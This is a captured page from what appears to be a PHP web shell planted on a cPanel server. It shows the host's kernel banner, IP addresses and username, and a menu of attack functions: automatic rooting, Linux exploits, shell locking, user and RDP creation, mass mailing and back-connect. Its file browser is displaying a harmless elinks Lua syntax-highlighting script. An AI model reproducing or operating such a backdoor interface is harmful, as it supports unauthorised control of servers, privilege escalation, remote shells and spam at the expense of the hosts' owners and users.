Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.80.43
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
elinks-data /
examples /
lua /
[ HOME SHELL ]
Name
Size
Permission
Action
babelfish.lua
1.46
KB
-rw-r--r--
bm-to-elinks-bookmarks.lua
704
B
-rw-r--r--
bm.lua
8.54
KB
-rw-r--r--
config.lua
2.44
KB
-rw-r--r--
elinks-remote
719
B
-rwxr-xr-x
highlight.lua
637
B
-rw-r--r--
hooks.lua
18.32
KB
-rw-r--r--
hooks.lua.in
18.32
KB
-rw-r--r--
md5check.lua
1.47
KB
-rw-r--r--
remote.lua
1.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : highlight.lua
-- Source-code highlighting hook highlight_file_types = { patch = "%.patch$", python = "%.py$", perl = "%.pl$", awk = "%.awk$", c = "%.[ch]$", sh = "%.sh$", } function highlight (url, html) for language,pattern in pairs(highlight_file_types) do if string.find (url, pattern) then local tmp = tmpname () writeto (tmp) write (html) writeto() html = pipe_read ("(code2html -l "..language.." "..tmp.." - ) 2>/dev/null") os.remove(tmp) return html,nil end end return nil,nil end table.insert(pre_format_html_hooks, highlight)
Close